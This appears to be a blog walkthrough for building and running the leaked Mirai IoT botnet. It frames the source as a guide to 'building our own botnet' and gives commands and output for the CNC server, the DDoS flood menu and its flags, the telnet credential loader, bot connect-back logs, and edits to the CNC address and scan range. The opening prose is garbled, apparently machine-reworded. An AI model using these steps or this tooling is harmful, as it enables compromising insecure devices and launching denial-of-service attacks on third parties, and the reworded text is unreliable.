Mirai is a self-spreading botnet virus. The Mirai botnet code contaminates inadequately secured web gadgets by utilizing telnet to discover those that are as yet utilizing their default username and password. The success of Mirai is because of its capacity to contaminate a huge number of these insecure gadgets and coordinate them to mount a DDOS attack against a picked unfortunate victim. Mirai took advantage of these vulnerable IoT devices in a simple but brilliant way. Rather than trying to use complicated techniques to monitor IoT devices, it examined each bot for open Telnet slots, then tried to log in using 61 random username/password combinations that are frequently used as the standard for these devices. In this way, it was able to generate a military of impacted closed-circuit TV digital cameras and routers, prepared to do its bidding.
As a famous and well constructed IoT botnet, It is analysed by many security researchers like the paper from Usenix, and the structure of Mirai:
The source code of Mirai has been released on Github by Anna-senpai, which provides us a good tutorial for building our own botnet. Here we follow the lead to compile and run it.
Now the BOT (mirai.$ARCH) and CNC binaries, and some other tools are all under mirai/debug/ (or mirai/release/) folder. The loader binary is under loader/.
Attack with Mirai
CNC Server
First start CNC server. Attention that in Mirai-Source-Code/mirai/cnc/admin.go line 20:
The prompt.txt gets a relative path, so we have to run cnc with prompt.txt existing in our current directory. Or just comment out it. Then you can run it:
1 2 3 4
$ cd Mirai-Source-Code/mirai/ # make sure `prompt.txt` in the same dir $ ./debug/cnc Mysql DB opened
я люблю куриные наггетсы пользователь: mirai-user пароль: **********
проверив счета... | [+] DDOS | Succesfully hijacked connection [+] DDOS | Masking connection from utmp+wtmp... [+] DDOS | Hiding from netstat... [+] DDOS | Removing all traces of LD_PRELOAD... [+] DDOS | Wiping env libc.poison.so.1 [+] DDOS | Wiping env libc.poison.so.2 [+] DDOS | Wiping env libc.poison.so.3 [+] DDOS | Wiping env libc.poison.so.4 [+] DDOS | Setting up virtual terminal... [!] Sharing access IS prohibited! [!] Do NOT share your credentials! Ready mirai-user@botnet# mirai-user@botnet# ? Available attack list udp: UDP flood dns: DNS resolver flood using the targets domain, input IP is ignored ack: ACK flood greip: GRE IP flood udpplain: UDP flood with less options. optimized for higher PPS http: HTTP flood vse: Valve source engine specific flood syn: SYN flood stomp: TCP stomp flood greeth: GRE Ethernet flood
You can adduser to add and arrange bot for it, use botcount to see bot number. Here ? can be understood as a placeholder to explain the meaning of the current position parameter:
mirai-user@botnet# udp ? Comma delimited list of target prefixes Ex: Ex: Ex:,
mirai-user@botnet# udp ? Duration of the attack, in seconds
mirai-user@botnet# udp 10 ? List of flags key=val seperated by spaces. Valid flags for this method are
tos: TOS field value in IP header, default is 0 ident: ID field value in IP header, default is random ttl: TTL field in IP header, default is 255 len: Size of packet data, default is 512 bytes rand: Randomize packet data content, default is 1 (yes) df: Set the Dont-Fragment bit in IP header, default is 0 (no) sport: Source port, default is random dport: Destination port, default is random source: Source IP address, for random
Value of 65535 for a flag denotes random (for ports, etc) Ex: seq=0 Ex: sport=0 dport=65535
The very first step for attacking, is to run loader. The loader reads telnet entries from STDIN in following format:
ip:port user:pass
You can prepare a formatted file and run like this:
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$ cat file.txt | Mirai-Source-Code/loader/loader 0s Processed: 0 Conns: 0 Logins: 0 Ran: 0 Echoes:0 Wgets: 0, TFTPs: 0 Hit end of input.
Mirai Bot
As for victims, they execute mirai binary to connect back to CNC server and continue to scan (brute forcing) hosts with weak telnet password:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
$ ./mirai.dbg DEBUG MODE YO [main] We are the only process on this system! listening tun0 [main] Attempting[ to kicollennr] eTrcyint g tto ko illCN pCort 23 [killer] Finding and killing processes holding port 23 Failed to find inode for port 23 [killer] Failed to kill port 23 [killer] Bound to tcp/23 (telnet) [resolv] Got response from select [resolv] Found IP address: f3251c73 Resolved cnc.server.com to 1 IPv4 addresses [main] Resolved domain [main] Connected to CNC. Local address = -335435584 [killer] Detected we are running out of `/path/to/Mirai-Source-Code/mirai/debug/mirai.dbg` [killer] Memory scanning processes [table] Tried to access table.11 but it is locked Got SIGSEGV at address: 0x0
Sometimes encounter [main] Failed to resolve CNC address, it might because in Mirai-Source-Code/mirai/bot/table.c the resolving domain is hardcoded in line 84, you can change it:
addr.sin_addr.s_addr = INET_ADDR(8,8,8,8);
When it receives commands from CNC it will follow the lead:
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[main] Connected to CNC. Local address = -335435584 [main] Received 14 bytes from CNC [attack] Starting attack... [main] Received 18 bytes from CNC [attack] Starting attack... [main] Received 18 bytes from CNC [attack] Starting attack... [main] Received 19 bytes from CNC [attack] Starting attack...
Attacking history is stored in Mysql:
1 2 3 4 5 6 7 8 9 10
mysql>select*from history; +----+---------+------------+----------+-------------------+----------+ | id | user_id | time_sent | duration | command | max_bots | +----+---------+------------+----------+-------------------+----------+ |1|1|1478583439|1| syn|-1| |2|1|1478583522|1| syn|-1| |3|1|1478583560|10| syn|-1| |4|1|1478584054|1| udp|-1| +----+---------+------------+----------+-------------------+----------+ 4rowsinset (0.00 sec)
In source code it scan totally randomly, we can control the range by editing Mirai-Source-Code/mirai/bot/scanner.c starting from line 674.